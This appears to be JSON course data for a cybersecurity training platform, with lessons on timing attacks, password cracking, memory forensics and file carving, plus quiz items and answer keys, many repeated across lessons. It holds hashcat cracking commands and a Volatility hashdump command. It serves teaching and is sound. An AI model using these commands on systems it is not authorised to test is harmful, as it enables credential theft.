exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"timing-attacks","cat":"Cryptography","title":"Timing Side-Channel Attacks","diff":3,"xp":200,"intro":"Measure comparison time to find correct bytes.","sections":[{"type":"text","content":"Early-return comparison leaks info via timing. Use constant-time comparison."},{"type":"code","lang":"python","content":"# VULNERABLE\nfor a, b in zip(token, real): \n    if a != b: return False\n# SAFE\nimport hmac\nhmac.compare_digest(token, real)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Prevent timing attacks on string comparison?","opts":["Longer strings","Constant-time comparison","Hash first","Reverse order"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"password-cracking-tech","cat":"Cryptography","title":"Password Cracking Techniques","diff":1,"xp":100,"intro":"Dictionary, rules, masks, rainbow tables.","sections":[{"type":"text","content":"Hashcat and John the Ripper: dictionary attack, rule-based mutations, mask brute force."},{"type":"code","lang":"bash","content":"hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule\nhashcat -m 1000 hashes.txt -a 3 '?u?l?l?l?d?d?s'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Hashcat mode for NTLM?","opts":["0","500","1000","1800"],"ans":2},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"volatility-basics","cat":"Forensics & IR","title":"Volatility Memory Forensics","diff":2,"xp":150,"intro":"Analyze a memory dump for malware and credentials.","sections":[{"type":"text","content":"Volatility extracts processes, connections, DLLs, and passwords from RAM dumps."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp --profile=Win7SP1x64 pslist\nvol.py -f mem.dmp --profile=Win7SP1x64 netscan\nvol.py -f mem.dmp --profile=Win7SP1x64 hashdump"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Volatility analyzes?","opts":["Network traffic","RAM dumps","Hard drives","Registry"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"memory-acquisition","cat":"Forensics & IR","title":"Memory Acquisition","diff":1,"xp":75,"intro":"Capture volatile memory before power off.","sections":[{"type":"text","content":"RAM disappears on shutdown. Acquire FIRST. Tools: DumpIt, LiME, FTK Imager."},{"type":"code","lang":"bash","content":"sudo insmod lime.ko 'path=/evidence/mem.lime format=lime'\nsha256sum /evidence/mem.lime > /evidence/mem.sha256"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why acquire memory before shutdown?","opts":["Encrypted after","RAM is volatile, loses data on power off","OS deletes it","Compressed"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"process-analysis-forensics","cat":"Forensics & IR","title":"Process Analysis in Memory","diff":2,"xp":150,"intro":"Find malicious processes among legitimate ones.","sections":[{"type":"text","content":"Check parent-child relationships, command lines, loaded DLLs, hidden processes."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp --profile=Win7SP1x64 pstree\nvol.py -f mem.dmp --profile=Win7SP1x64 psxview  # compare pslist vs psscan"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Detect hidden processes?","opts":["Task Manager","Compare pslist vs psscan","CPU usage","Event log"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"network-forensics-mem","cat":"Forensics & IR","title":"Network Connections in Memory","diff":2,"xp":150,"intro":"Memory preserves connections invisible on disk.","sections":[{"type":"text","content":"netscan shows active and recently closed connections with process IDs."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp --profile=Win7SP1x64 netscan\n# Look for unusual external IPs and suspicious process connections"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why check network in memory?","opts":["More accurate","Malware can delete logs but not RAM connections","Logs don't show connections","Shows future connections"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"malfind-forensics","cat":"Forensics & IR","title":"Malfind \u2014 Detecting Injected Code","diff":2,"xp":200,"intro":"Find executable code hiding in legitimate processes.","sections":[{"type":"text","content":"malfind finds executable pages not backed by a file \u2014 detects process injection."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp --profile=Win7SP1x64 malfind --dump-dir /output/"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"PAGE_EXECUTE_READWRITE indicates?","opts":["Normal memory","Suspicious code region","Read-only data","Kernel memory"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"file-carving","cat":"Forensics & IR","title":"File Carving","diff":1,"xp":75,"intro":"Recover deleted files by searching for file signatures.","sections":[{"type":"text","content":"Search raw disk for file headers (magic bytes) to extract deleted files."},{"type":"code","lang":"bash","content":"foremost -i disk.dd -o /output/\n# JPEG: FF D8 FF, PNG: 89 50 4E 47, PDF: 25 50 44 46"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"File carving relies on?","opts":["Filesystem metadata","File headers (magic bytes)","File names","Directory entries"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files 